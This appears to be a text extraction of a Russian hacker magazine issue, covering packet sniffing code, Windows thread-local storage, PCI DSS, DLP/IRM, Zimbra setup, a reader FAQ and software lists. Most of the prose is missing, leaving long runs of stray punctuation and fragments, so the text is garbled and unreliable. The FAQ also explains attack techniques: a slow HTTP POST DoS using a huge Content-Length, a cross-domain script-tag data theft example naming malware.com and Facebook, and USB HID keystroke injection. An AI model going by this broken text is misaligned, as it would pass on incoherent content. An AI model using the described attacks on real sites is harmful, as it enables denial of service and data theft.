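    """Fixed IPv4 header fields plus the payload delimited by Total Length.
    Raises ValueError on anything a sniffer must not trust: wrong version,
    IHL below 20, Total Length larger than the bytes received."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    (vihl, tos, total_len, ident, flags_frag, ttl, proto,
     hcs, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    version, ihl = vihl >> 4, (vihl & 0x0F) * 4
    if version != 4 or ihl < 20 or total_len < ihl or len(pkt) < total_len:
        raise ValueError("bad version, IHL or Total Length")
    return {
        "ihl": ihl, "tos": tos, "total_length": total_len, "id": ident,
        "flags": flags_frag >> 13, "frag_offset": flags_frag & 0x1FFF,
        "ttl": ttl, "protocol": proto,
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "checksum_ok": ones_complement_sum(pkt[:ihl]) == 0,
        "payload": pkt[ihl:total_len],
    }


def parse_tcp(seg):
    """Fixed TCP header; Data Offset is validated the same way as IHL."""
    if len(seg) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, window, cksum, urg = struct.unpack("!HHIIHHHH", seg[:20])
    data_off = (off_flags >> 12) * 4
    if data_off < 20 or len(seg) < data_off:
        raise ValueError("bad TCP data offset")
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x1FF, "window": window, "payload": seg[data_off:]}


def dissect(pkt):
    """IP layer plus TCP (protocol 6) as nested dicts, like the article's tree."""
    ip = parse_ipv4(pkt)
    if ip["protocol"] == 6:
        ip["tcp"] = parse_tcp(ip["payload"])
    return ip


def build_ipv4_tcp(src, dst, sport, dport, payload, flags=0x018, ttl=64):
    """Constructed test packet with a correct IP header checksum
    (DF set, TCP checksum left at zero since only the IP layer is checked here)."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1, 1, (5 << 12) | flags, 8192, 0, 0) + payload
    total = 20 + len(tcp)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0x1234, 0x4000, ttl, 6, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ones_complement_sum(hdr)) + hdr[12:]
    return hdr + tcp
```

The receive callback of the C# sniffer would do the equivalent of dissect on byteData[0:nReceived]; the length checks are what keeps a malformed packet from turning into an out-of-range read in the parser.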


:

.
- .NET Remoting.
.

, -,
,

:
/* configure Remoting from the client's configuration file */
RemotingConfiguration.Configure("Client.exe.txt");
// create the remote object
Test test = new Test();
// send the captured tree to the server
test.SendLog(rootNode);

On the server SendLog() appends what it receives to Result:

public void SendLog(string SensorLog)
{
    // accumulate the sensors' reports
    Result = Result + SensorLog;
}

and Show() displays the accumulated Result:

test.Show();

Show() ,
Result .
Show() :
,
(, ) ,
.

? , !

(,
! -, :) ..)
: ,
, , - ,

.
, ,
, ,
.
, ! z

deeonis deeonis@gmail. com


TLS

, ,
, .
.
, ...
.
,
.
? .
strtok C++.
, , .
. ,
strtok ,
.
,
,
,
.
.
, .
,
.

// globals shared by all threads
int tls_i;
char tls_char[25];

// thread function
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
    // both threads write the same variables
    tls_i = (int)lpParam;
    lstrcpy(tls_char,"array of char");
    char szMsg[80];
    wsprintf( szMsg, "Parameter = %d.", tls_i );
    MessageBox( NULL, szMsg, "ThreadFunc", MB_OK );
    return 0;
}

int APIENTRY WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    DWORD dwThreadId;
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)1, 0, &dwThreadId);
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)2, 0, &dwThreadId);
    Sleep(10000);   // wait 10 seconds for the threads
    return 0;
}

, .
/
.
. ,
, ,
,
thread-local storage (TLS).

thread-local storage?

TLS
. ,
, ,
. ,
. , .

DLL, ,
.
.
TLS : .

X 01 (144) 2011


[Figure: TLS slots. Every thread has its own array of TLS_MINIMUM_AVAILABLE slots, indexed 0 .. TLS_MINIMUM_AVAILABLE - 1, all initialised to 0; the same index refers to a different slot in each thread.]

,
.
.

thread-local storage Windows


API. : TlsAlloc, TlsGetValue,
TlsSetValue TlsFree. ,
, , TLS .
.

FREE INUSE, , . TLS_MINIMUM_
AVAILABLE . ,
Windows 98/Me 80, Windows 2000/XP
1088. TLS_
MINIMUM_AVAILABLE PVOID.
TlsAlloc ,
. ,
FREE . TlsAlloc
: DWORD WINAPI TlsAlloc(void).
, TLS_OUT_OF_INDEXES.
TlsSetValue, ,

.
TlsAlloc,
, TLS.
TlsSetValue, PVOID-.
- .
TlsSetValue
BOOL WINAPI TlsSetValue(
    __in DWORD dwTlsIndex,
    __in LPVOID lpTlsValue
);

, TlsGetValue
, . : PVOID TlsGetValue(DWORD dwTlsIndex). TlsSetValue, TlsGetValue
dwTlsIndex , TlsAlloc.
, , TlsFree. ,
, , TlsAlloc. API ,
.

TLS


, .
WinMain TlsAlloc,

PVOID. ,
TLS , , , .

TlsFree.
TLS: TlsAlloc / TlsSetValue / TlsGetValue / TlsFree

#include <windows.h>

// TLS indices: shared by all threads, but the value stored under
// each index is private to the thread that stored it
DWORD tls_i;
DWORD tls_char;

// thread function
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
    // store the thread parameter in this thread's TLS slot
    TlsSetValue(tls_i, lpParam);
    // each thread owns its own heap buffer, reachable only via its TLS slot
    char *char_buf = new char[25];
    lstrcpy(char_buf, "array of char");
    TlsSetValue(tls_char, char_buf);
    char szMsg[80];
    // TlsGetValue returns LPVOID, so the integer has to be cast back
    int i = (int)(INT_PTR)TlsGetValue(tls_i);
    wsprintf( szMsg, "Parameter = %d.", i );
    MessageBox( NULL, szMsg, "ThreadFunc", MB_OK );
    delete[] char_buf;
    return 0;
}

int APIENTRY WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    DWORD dwThreadId;
    tls_i = TlsAlloc();
    tls_char = TlsAlloc();
    // TlsAlloc returns TLS_OUT_OF_INDEXES when no slot is free
    if (tls_i == TLS_OUT_OF_INDEXES || tls_char == TLS_OUT_OF_INDEXES)
        return 1;
    CreateThread(NULL, 0, ThreadFunc, (LPVOID)1, 0, &dwThreadId);
    CreateThread(NULL, 0, ThreadFunc, (LPVOID)2, 0, &dwThreadId);
    Sleep(10000);  // wait 10 seconds for both threads to finish
    TlsFree(tls_i);
    TlsFree(tls_char);
    return 0;
}

,
, ,
, .

TLS-.

thread-local storage

TLS

. thread-local
storage .
PE-, .tls
( ), ,

. TLS,
, , .
,
API thread-local storage,
C++. .

TLS: __declspec(thread)

#include <windows.h>

// TLS variables: every thread gets its own copy of each one
__declspec(thread) int tls_i;
__declspec(thread) char tls_char[25];

// thread function
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
    tls_i = (int)(INT_PTR)lpParam;
    lstrcpy(tls_char, "array of char");
    char szMsg[80];
    wsprintf( szMsg, "Parameter = %d.", tls_i );
    MessageBox( NULL, szMsg, "ThreadFunc", MB_OK );
    return 0;
}

int APIENTRY WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    DWORD dwThreadId;
    CreateThread(NULL, 0, ThreadFunc, (LPVOID)1, 0, &dwThreadId);
    CreateThread(NULL, 0, ThreadFunc, (LPVOID)2, 0, &dwThreadId);
    Sleep(10000);  // wait 10 seconds for both threads to finish
    return 0;
}

__declspec(thread),
TLS-.
, , ,

WinAPI.
, . tls_char
, TLS,
CHAR. ,
(1088 Windows XP), , tls_char , 25 thread-local storage. ,
dll, , , TLS.
, ,
. TLS
,
.

, TLS
.
,
thread-local storage . z

E-INK

, ,
. 7-8 , , ,
. ? ? Wexler Wexler Book T7001, 4-
!

Wexler Book
T7001
7- TFT-.

E-Ink,
,
Wexler
:
,

.
, ,

DVD-RIP.



4 ,
MicroSD ( 16
)
.

, FM-

.


: TXT, PDF, FB2, RTF, EPUB, HTML
: AVI, Xvid, Divx 4/5, RM, RMVB, FLV, KV
: JPG, BMP, GIF
: MP3, WMA, APE, FLAC, AAC
: , FM-,
: 200x132x13
: 300
: www.wexler.ru

3990 .


,


5 ,
7 .
6 .



.

PDF.



.


.

Wexler Book T7001





.


.

SYN/ACK
c0n Difesa condifesa@gmail.com, http://defec.ru


PCI DSS

(PCI DSS) ,
.
?
, .

: -, -
, .
, ,

.
-,
.
,
, .

, , -
-
- (). , ,

().

,
, , .
(Payment
Card Industry Security Standards Council, PCI SSC),
(Visa, MasterCard, American
Express, Discover, JCB), ,
(Payment Card Industry
Data Security Standard, PCI DSS).
.

. , , ,
,
. PCI DSS, ,
,
.
:
,


, .
- , ,
.

PCI DSS

,
, ,
,
,
, . ,
PCI DSS
, ,
, .
:
1. (Glossary);
2. (Payment
Card Industry Data Security Standard);
3. (PCI
DSS Security Audit Procedures);
4. (PCI DSS Security Scanning
Procedures);
5. , QSA- (PCI DSS Validation
Requirements for Qualified Security Assessors);
6. , (PCI DSS
Validation Requirements for Approved Scanning Vendors);
7. PCI DSS (Navigating PCI DSS Document);
8. PCI DSS
(Prioritized Approach for PCI DSS);
9. (PCI DSS Self-Assessment Questionnaire);
10. (
, ).
, , ,

, ,
.
PCI DSS, ,
,

, ,
.

. 7-9
( ) , ,
, (
-) :
PCI DSS( 7)
12 PCI DSS ( 1)
, ;
( 8) ,
, ,
, , ,
.

PCI DSS ,
, -
,
,
.
( 1-6
) , ,
, QSA.
PCI DSS
.
-

, . , ,

, ,
, ,
, ,

,
,
. , ,

,
.


PCI DSS,
, (PAN).
,
, .
, ,
PAN ,
, .
,

, , , CVV2
(Card Verification Value 2
Visa) CVC2 (
MasterCard)
, , . , , -

-.
PCI DSS (,
, -)
, CVC2
CVV2 online-.

,
, PCI DSS,
, ,
.
, , -

HTTP://WWW
links
http://pcidss.ru/articles/22.html

2.0
PCI DSS.
https://www.pcisecuritystandards.org/security_standards/documents.php

PCI DSS
v2.0 .
http://www.xakep.ru/post/49549/ :
PCI
DSS.


.

[Figure: the PCI DSS document set: Payment Card Industry (PCI) Data Security Standard; PCI DSS Security Audit Procedures; PCI DSS Security Scanning Procedures; Glossary; Navigating PCI DSS Document; PCI DSS SAQ (A, B, C, D); Prioritized Approach for PCI DSS]


- ,
, .
. ,
.
-
, .
PCI DSS , ( )
( ).

, ,
.
PCI DSS , ,
.
:
1. ,
, ;
2.

;
3. - ,
( ) .

PCI DSS v2.0 ( 28 2010 ). 12



.


( 1 2). ,

, , . : .

. ,


.

( ),
1.4,

(
) , ,
. :

, ,
, .
,
. , 2.2.4,
: , , , , ,
-. ,
,
.
(
3 4) (, ..) ,
,

Table 3.4 (PCI DSS): card data elements
CAV2/CVC2/CVV2/CID
PIN / PIN Block
Primary Account Number (PAN)
Cardholder Name
Service Code
Expiration Date

,
,
.
. ,

( -
),
,

. ,
,
(,
),

,
.
, 5 6,
. ,
, :
,
,
,
-. ,
,
, -
11.
(7, 8 9)
-

,
.
, ,


. -

.



. , , ASV,
. , ,

PCI DSS ASV-
( 11.2 11.3) ,
.
,
, , ,
,
.
12 :
,
- . 12.1.1
, PCI
DSS. - -,
, , ,
,
.

-
.

INFO
info

(PCI DSS v2.0 28
2010 )

.

.

WARNING
warning



PCI DSS v1.2.

. ,
,

.
,
,
,
,
PCI DSS.z


SYN/ACK
luchnik@it-university.ru

DLP, IRM WS2008



,
?

DLP IRM, .
IRM DLP , Windows Server 2008.



, . ,
.

,
. , ,
, , DRM (Digital Rights Management,
Digital Restrictions Management).
( ,
, )
:
EDRM Enterprise Digital Rights Management
ERM Enterprise Rights Management
IRM Information Rights Management
RMS Rights Management Services, Microsoft IRM

.
. ,

, , ,
,
. ,
, :
,
e-mail
;
, ,
, , .
DLP (Data Leakage
(Loss) Prevention) , .


DLP IRM
?

, , DLP
IRM. (IBM, Cisco, RSA ( EMC), Oracle, Microsoft, CheckPoint, Symantec)
.
,
. ,
,
.
DLP- :
Data-at-Rest. , , , . ,
, .
Data-in-Motion. (, , ) ,
.
Data-in-Use. , ,
.
DLP-
. , ,
,
-. ,
. DLP- ,
.
, , (,
), ,
,
, .
,

2.
AD RMS.

, DLP-

.
, ,
, . , , .
-, , ,
, , .
DLP- . , , . ,
//
, DLP-, . .
, ,
, , , ,

. DLP-
.

, , , ,
? IRM-.
IRM . , . DRM,
, IRM
, . IRM
.
DLP IRM . DLP
,

. DLP ,
.
,
IRM.

AD RMS?

Active Directory (AD RMS;


Windows Server 2008, Rights Management Services
) IRM-,
. AD RMS
. , SharePoint
,
. , Windows Server
2008 R2 File Classification Infrastructure,
, , ,
. AD RMS : Full Control, View, Edit, Save, Extract, Export, Print, Allow
Macros, Forward, Reply, Reply All, View Rights. AD RMS
:
Word, Excel, PowerPoint InfoPath, 2003
. , Microsoft Office Ultimate 2007,
Office Enterprise 2007, Office Professional Plus 2007 Office 2003
Professional, , ,
AD RMS.
Microsoft XML Paper Specification (XPS).
MS
:
pdf- Foxit
PDF Security Suite, GigaTrust Enterprise, Liquid
Machines Secure Islands. Foxit
pdf- Microsoft Office
SharePoint Server. GigaTrust ,

.

4. WatchDox

3. AD RMS

1. ,
AD RMS


CAD- .
AD RMS
Software Development Kit (SDK),
,
AD RMS.
AD RMS
, , , . 1
. 2
, :


1. , , RAC CLC AD RMS.


2. , AD RMS,

. , , , AD RMS .
publishing license,
. AD RMS
, . , CLC.
3. .
RAC. , AD RMS .
4.
use license AD RMS, publishing license. publishing
license, .





DRM-. SaaS Watchdox
Confidela,
Amazon Web Services. WatchDox Secure file sharing
www.watchdox.com,
(View, Print, Edit, Forward, Spotlight Copy/Paste),
.
.
-, ,
. ,
, , ,
.

e-mail, .
,
. ,
e-mail.
HTTPS, AES.
, ,
,
(. 4). Spotlight,
,
.
, , ,
.

,
e-mail, ( e-mail ,
,
Confidela
).

5. , .
, use license,

(, ).
6. ,
, , , .

AD RMS

AD RMS :
Active Directory Domain Services (ADDS)
URL AD RMS Service Connection Point (SCP)
. AD RMS
.

Microsoft SQL Server , Windows
Server 2008.
, AD
RMS, Web Server (IIS).


technet.microsoft.com/en-us/library/dd772697(WS.10).aspx

.
www.xrml.org eXtensible Rights Markup Language ,
AD RMS.
DRL-
IRM- : DLP- (www.bytemag.ru/articles/detail.php?ID=16748), GroupTest: DRM & DLP tools (www.scmagazineus.com/grouptest-drm--dlp-tools/printgrouptest/182/), DLP (www.cnews.ru/reviews/free/security2009/articles/dpl.shtml).

Windows XP, Windows 2000 Windows Server 2003


AD RMS Microsoft Windows Rights Management
Services Client.
AD RMS
(. 3), :
Active Directory Rights Management Services Identity Federation
Support, AD FS AD RMS
. AD RMS
. AD RMS , Service Connection Point
Enterprise Admins.
,
,
AD RMS. ( CNAME) DNS- URL
AD RMS SQL-, AD RMS.
AD RMS (Rights Policy Templates), ,
,
. ,
,
.
, ,
offline-. ,
offline-,
AD RMS , (

, , Office 2007 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Common\DRM\AdminTemplatePath).

DLP- IRM- ,
.
, ,
. AD RMS,
,
IRM- ,
, ,
. , AD
RMS DLP-, ,
RSADLP..z


SYN/ACK
grinder grinder@ua.fm, tux.in.ua


Zimbra:

must have
.
, , .
Zimbra Collaboration Suite (ZCS), ,
.

ZCS

Zimbra Inc.
2007 , .

OpenSource , ,
. 2007
Yahoo!, 2010 VMware.
Zimbra ,
. ,
POP/POPS IMAP/
IMAPS -.
ClamAV. ,

,
,
Zimbra. ,
Zimbra,
.
Zimbra
(Jabber), ,
,
WYSIWYG Zimbra Document.
RTF, HTML, ,
. , Zimbra Document
, .
.
,
( URL).
e-mail RSS/Atom.
, e-mail. -


, , .
Zimbra
(Windows Mobile, iPhone, Nokia E ), - , .
,
LDAP , Active Directory.
API,
zimlets Zimbra.
ZCS ,
, ,
. Zimbra .
, .
-
. Zimbra Server Java,
POP3/IMAP , OpenSource ,
nginx, Apache Lucene, OpenLDAP, MySQL, Postfix, POP3/
IMAP4 Perdition, ClamAV, DSPAM .
- Zimbra Web Client ,
-
.
AJAX,
. , ,
,
, ,
Skype Ekiga,
.
, , Zimbra Desktop, (, , ),

IMAP/POP3 .
ZCS : Open Source Edition,
Network Edition (Starter, Standard Professional) Zimbra
Appliance (Basic, Standard).
OpenSource- ZPL
(Zimbra Public License).
,
,
Zimbra
.
,

MS Outlook, ,
(. zimbra.com/products/compare_products.html).
, "" OpenSource
.
, Wiki
, Zimbra.
Open Source Edition .

ZCS OpenSource
Edition

6.0.8, Ubuntu
10.04 LTS. 32 x64
Linux (Red Hat Enterprise, Fedora, Ubuntu, Debian,
Mandriva, SUSE Linux) Mac OS X.
. Ubuntu
6.06 8.04 LTS,
10.04 -
. ,

.
DNS , A MX
.

, 10 .
, .
64- .
$ wget -c http://files2.zimbra.com/downloads/6.0.8_GA/zcs-6.0.8_GA_2661.UBUNTU8_64.20100820044710.tgz

.
$ tar xzvf zcs-6.0.8_GA_2661.UBUNTU8_64.20100820044710.tgz
$ cd zcs-6.0.8_GA_2661.UBUNTU8_64.20100820044710

Ubuntu 10.04 , --platform-override:

HTTP://WWW
links
Zimbra
zimbra.com

Zimbra
zimbra.com/products/compare_products.html

wiki.zimbra.com/wiki/
User_Migration

INFO

$ ./install.sh --platform-override


Zimbra, .
/etc/hosts
.
, .
- ,
MISSING, . ,
.

info



Zimbra: 22, 25, 80,
110, 143, 389, 443, 993,
995, 7025.


-
$ sudo apt-get install libpcre3 libgmp3c2 libgmp3-dev
sysstat libexpat1 wget

,
(
11). ,
zimbra-memcached zimbra-proxy ( POP3, IMAP
HTTP). , zimbra-proxy, memcached .
. ,
. DNS
Zimbra, (A MX) /etc/hosts, .
,
. , ,
. Admin
Password, .
.
, 3, ,
Admin Password ( ***),
. , r, s a (
) q.
. ,
/opt/zimbra/log.
Zimbra , . :
$ ./install.sh --uninstall

/opt/zimbra, .

- Zimbra

.
, URL
. ,
(HTML), (AJAX) . , AJAX, , .

,
.
, , , ,


. ,
. , -
,
. - Zimbra
, .
- 7071 .
https://server.com:7071,
admin .
,
.
:
, ,
,
;
, , (, )
, zimlets
, ;

( , ,
CPU,
);
, ;
(,
, ).
,
,
, - .
,
, .

, wiki -.

.
CSV,
. ,
, . :
user@domain.com,name,password

, ,
.

, .

, .. Zimbra .
, - to Zimbra migration.

Zimlet, .
.
, default
,
, .
,

. (
).
.
, ,
. .
. ,
.

, ,
, MTA, POP, IMAP, Exchange
.
, :
, .

.
6 zimlets.
/opt/zimbra/zimlets*.
, Zimlets,
zip .
zimlets ( )
. .

Zimbra
-, Zimbra ,
zimbra.
Zimbra CLI
Commands (zimbra.com/docs/os/6.0.8/administration_guide).
service zimbra status
zmcontrol.
zmcontrol (status | stop | start | maintenance | startup)


. ,
-H .
zmaccts , zmprov
LDAP,
,
.
.

Wiki- (wiki.zimbra.com/wiki/User_Migration).
.

. ,
. default,
Zimbra.

, , .
7 , , (HTML AJAX), ,
, ,

, ,
, ,

.
, *nix .
.z


UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:



Smart has the brains, stupid has the balls, Diesel. . balls
, balls brains , . , .
, ,
.
, ,
: ,
.
,
, .
,
,
, .
.
; , , .
.
.
,
, .
. , ,
.
, .
.

,

?
,
.
, , .
:

:


;

;

(
);
,
, , ,
;

( , );
, , , ;
,
.
.



.
: (
), ( )
( ).
,
. :
, , (, )

,
, (-, - ).


, . ,
, , ,
,
.
,
,

. ,
,
, ,

, ,

.
,
, ,
. ,

,
, . ,
-
.


,
, ;
70-80% ,
. ,
, , , ,
? .
,
,
,
.
.
,
, ,
.

, ;

,

.

,
:
. ( ):
(, ),

. ,
, , , , ;
,
; ,
, ,

.
. ():
,

, (
) ; ,
,

, , . ,

. ,
.
. : ,

, ,
, ,
;
, , ,
.
, . ,
,
,
(),

(, , , ),
().
, ,
.

,
,
(, ),
, ( ); ,
, , .
,
, .

,
.
.
,
, , ][,
ASP.NET; , ,
.
(
) (
)
. ,

,
,
ASP.NET
, .


,
.
,
(
, 2009) (-
, , 2010)

, ,
(
; , ,
][). ,
,

, ,
,
-
.
, , ,
,
,


.
.



,

, ,
( ,
,

,
).
, ,
,
,
?
?
1. , ,
: (), .

( + ).
,
,
(, ):
(

, ,
. ).

, (

;

, .
+ ).
, , , , . ,
; , ,
(
).
,
. ().
2. . ,
? ,
;
, , .

, .
, ,


,
,
. ,
.
, 6 ,
,
,
:
,
, .
, ( ), , -


, ,
, , ,
, , .
, ,

,
.

, ,
.
,
, -

; ,
.
- , ,
. ,
, ,


,
.
,
? .
1. ( ),
.
,
,
:
- ; , ,
;
- ;
QWERTY
,
;
- ,
:
, .
2.
,
,
.
:

, -.
:

( ,
),

,
.

(
), ,
.
,
.
3.
, .
,

, , , ;
,
.
4. ;
,
,


.
, ,
.
, , , , , .
5. .

.
: , ,

( ).

,
:
,

,



.

. ,
, ( )
,
1,2,3,4
.. .
3. .

. , ,
, , .
,
, , , -
, , , ,

. , ,
, .
4. .
,
, , ,

.

:


.
,
, , , , , ..

, .
,
.
5. . ,
. ?
,
, , ,
. ,
, ; ,
,
, , ,
-
.
, , , ,
,

.
, . , .
,

.
6. .
,
- ,

, -
,
,
,
-.
,

( ) . ,
-
, :

,
.
,
,
,
.

. ,

. , .


.
,



- -.

,
,
, .
, - . , ,
,
, .

(:
.
, ,
). injection


, .
(
) ,
. ,
.

:
. ?
. , .
, ,
, , ,
. ,

, ,


, ,

,
.
: ABC!
!



: ABC
.
-,
.
,
, , . ,

,

.

, , .
, , ,
, ,
.
,
stupid&funky,

. , , ][
,
, smart is a new sexy :).z

UNITS
step twitter.com/stepah, ant

faq
united?

faq@real.xakep.ru

Q: . , .

R-Studio.
, . ,
, .
.
A: , ,
, .

NTFS Undelete (www.ntfsundelete.com).
- : ,

.
. ,
( R-Studio),
,

, NTFS Undelete .
, ,
, .
, -
. Linux MacOS (,
Windows) PhotoRec (www.cgsecurity.org).


Q:
, USB. ?
A: ,
,
.
-. , USBTrace (www.sysnucleus.com) USB
Monitor (www.hhdsoftware.com).
-, USB- .
- (
, ) ,

(
, ),
, . , ,
Microsoft
Kinect.
OpenKinect
(openkinect.org).

Q: ,

?
A: Process Explorer
.
DLL
, .


. , ,
,
.

Q: , SSH

, . ,
?
A: , ,
. ,
Linux Windows.
1. ssh X11:
/etc/ssh/sshd_config Ensure
X11Forwarding yes.
2. Windows -, ,
Xming (www.straightrunning.com/XmingNotes).
,
Display.
Multiple windows and set
the Display .
3. SSH PuTTY.
Connection SSH X11. Enable X11 forwarding X
display location :0.0.
4. ,
,

X11

NTFS Undelete
SSH-.

GUI- ( Firefox).
.

Q: USB- ( exe-),
?
A: ,
Defcon', Teensy USB HID Attack Vector.

, .
:
, autorun.inf

.
USB-, ,
HID- (Human Interface Device).
,
. ,
(Teensy USB Board) $18,
.
bit.ly/programmable-hid-usbkeystroke-dongle.

Q:
Microsoft Office Google
Docs?
. ,

Google.
A: ,
OffiSync (offisync.com).

Microsoft Office,
,
Microsoft Office Google Docs.

, Google. ?
, ,
.
, Google
, (
Google Cloud Connect),
.
OpenOffice ,
ooo2gd (code.google.com/p/ooo2gd).
Google
Docs, Zoho (www.zoho.com), WebDAV
( ,
).

Q: , Firefox
?
A:
,
fingerprinting, 2008 .


WhiteHat Security (jeremiahgrossman.blogspot.com/2006/08/i-know-what-youve-got-firefox.html).

. , ,
,
, , User-Agent
- .
,
JavaScript API. ,
Firebug,


JavaScript- console.
,

.

Q: AJAX-,

while(1);
for(;;);. ?
A: ,
(cross
domain attacks). ,
for/while . , Facebook.
malware.com. ,
:
<script src="facebook.com/ajax/friends.php"></script>

, malware.com friends.php, ,
Facebook. ,
malware.com
,
AJAX- ,
malware.com
script, for/while .
Facebook? AJAX-,

.
malware.com -
,
XMLHTTPRequest .

Q:

PHP-?
A: PHP , ... .
-
( , -

,
.

Q:
,

?

, , .
A: ,

Must Have SSD-




),

. PHP

.
- ,
PHP.

Q: -
-,
DDoS-?
A: , .
OWASP (www.owasp.org/images/4/43/Layer_7_DDOS.pdf), DDoS-
-.
,
- -,
HTTP-. ,
,
, , , . ?
-.

Content-Length, -
(, Content-Length: 10000000).
, - 10000000
.
,
,
,
10-100 .
, - (
, ).
-
. ,
,
.


, , .. HTTP POST-.
, Apache,
.
.
Acunetix WVS
(www.acunetix.com/blog/wp-content/uploads/2010/11/wvs-scripting1.png),
256 TCP- -, ,
, (1 ).
HTTP POST- (POST /aaaaaaaaaaaa HTTP/1.1).
DDoS . ,
20000 .
, Apache',
MaxClients.
256
. .

Q: -,
HTTP-
,
?
A: Sergio
Proxy (spareclockcycles.org/downloads/code/sergio_proxy_v0.1.tar.gz). Python .

Q: ][ ?
A: ,
: LordPE OllyDump.
, , :

, ,
. ,

exe-,

, , .
. - , , ,
, ,
. ,
()
.
,
() .

( ), .
,
.
.
, .
Windows XP,
.
.
snapshot
. ,
Temporary Internet Files (, ..),
, .
- ,
. ,
. ,
.
:
Norton Safe Web (safeweb.norton.com), WOT
(www.mywot.com), McAfee Site Advisor (www.siteadvisor.com). ,

,
. , xakep.ru
,
( ).
, - -

, . :
Site Advisor ,

. z

>Security
Agnitio
API Monitor v2 r3
BlackSheep
CryptoNark
CUDA-Multiforcer 0.72

>Net
App for the milk - 0360
Firefox 4.0 Beta 7
GMail Drive (Beta) 1.0.17 Beta
GNS3 Graphical Network Simulator 0.72
MailStore Home 4.1.0
PeerBlock 1.1
Safari for Windows 5.0.3
Serv-U 10.3.0.1
UltraVNC 1.0.9.1
WATOBO 0.9.5
WeFi 4.0.1.0
Wireshark for Windows 1.4.2
Xming X Server for Windows 6.9.0.31
zButterflySetup 1.2.0

>Multimedia
1by1 1.72
Adobe Reader X
doPDF 7.1.351
Foxit Reader 4.3
Free Video Converter 1.3.0
Jing
LibreOffice Beta3
Machete Lite 3.6
Paint.NET 3.5.6
ProgDVB 6.49.4
REAPER 3.73
TagScanner 5.1.594
VidCoder 0.7.0

>Misc
All-In-One Tray v1.0
BlueScreenView 1.29
Dictionary.Net 3.0
Eraser 6.0.8
Find and Run Robot (FARR) 2.93.1
GmailDefaultMaker 2.0.1.4
HTC Home 1.10
ManicTime v1.4.8
NirCmd v2.46
Offisync
PasteBoard 2.1
Print Suite .Net 1.1
SE-DesktopConstructor 1.1.1
SingleInstance v1.0
TreeSize Free 2.5.1
windroplr 1.3

>>WINDOWS
>Development
IE Collection 1.7.0.5
Python 2.7.1
Python 3.1.3
Qt SDK for Windows
Zend Studio 8

>Devel
Check 0.9.8
Claw 1.6.1
dlib 17.32

>UNIX
>Desktop
Adobe Reader 9.4
gCue2tracks 0.5.0
Gnac 0.2.2
KSmoothDock 4.5
Liquid Weather 15.0
MathGL 1.11
MyTetra 1.26
PyPanel 2.4
qRFCView 0.62
QtCurve 1.7
Sage 4.6
Strigi 0.6.4
SystemClean 1.2
TuxCards 2.2.1
Udav 0.7
VLC 1.1.5
VYM 1.12.8
Xcowsay 1.3

>Games
Smokin Guns 1.0

>System
Cameyo 1.55
CCEnhancer 2.0
ClearCloud
CrystalDiskInfo 3.9.3a
EASEUS Partition Master Home Edition 6.5.2
ERUNT GUI 1.2.5
EventLog Inspector 2.5.0.605
HWiNFO32 3.62
Logstalgia 1.0.0
Malwarebytes Anti-Malware 1.46
Moo0 SystemMonitor 1.62
Nomad.NET 2.8.7 RC
Process Lasso v4.00.23
RouterPassView 1.20
Secunia PSI 2.0 BETA
SmartPower 1.0.0
Soluto 1.1 Beta
SSDlife Free 1.0.12
USB Monitor
USBTrace 2.5.4
Web Log Storming 2.4.1

>Security
Alliance 1.0.6
BlackSheep
Chkrootkit 0.49
Column Finder 1.1
Crunch 2.6
CUDA-Multiforcer 0.72
Ddosim 0.2
Fierce Domain Scan 2
File Ripper
GNS3 0.7.2
NiX Brute Forcer 1.0.3
PAC 2.5.3
Privoxy 3.0.17
Retroshare 0.5.0
RIPS 0.35
SinFP 2.06
Snort 2.9.0.1
SQL Injection Vulnerability Scanner

> Chrome:
AdBlock 2.2.7
AdThwart 1.0.13
Chrome TV 2.0.3
Click and Clean 4.0.0.0
Facebook Fixer 1.0
Google Calendar Checker 1.1.0
Google Mail Checker 3.1
Google Translate 1.2.3.1
Xmarks 0.9

>Net
BottomFeeder 4.6
EiskaltDC++ 2.1.0
Google Chrome 7.0.517.44
Mozilla Firefox 3.6.12
Opera 10.63
pDonkey 0.05
QGoogleTranslator 1.2.0
NiX ProxyChecker 1.5.1
SABnzbd 0.5.6
Torrentflux 2.4
TorrentSniff 0.3.0
TvRss 1.8
TwitMail 0.42
Vacuum IM 1.0.2

FreePascal 2.4.2
KlassModeler 0.8
Lazarus 0.9.28.3
LeakTracer 2.4
libcfg+ 0.6.2
libconfig 1.4.6
Loki 0.1.7
Makepp 1.50
Mercurial 1.7.1
Nemiver 0.8.0
Premake 4.3
PScan 1.3
Redcar 0.8.1
Szl 1.0
Webspec 1.2.1

Digital Forensics Framework 0.8.0


filefolderenum v1.0.8
Malware Analyzer 2.6.2
mdmp 0.2.4
Nessus 4.4.0
NetTool 4.7.2
NoVirusThanks Anti-Rootkit 1.1.0.0 FREE
plecost 0.2.2.9 beta
Proxocket 0.1.5
Sandcat 4.0.3.0
SandKit
SiteDigger v3.0
Watcher 1.4.1
XSSER 1.0

>>MAC
Alfred 0.7.2b
AppFresh 0.8
Bash Completion 1.2
Bonjour Browser 1.5.6
Chax 3.0.2
Deeper 1.2.6
Dropbox 0.7.110
Evernote
Hex Fiend 2.0
Homebrew 0.1
iStat Pro 4.92
Maintenance 1.3.4
Perian 1.2.1
RoundCube 0.4.2
Skype 2.8

>X-distr
Fedora 14

>System
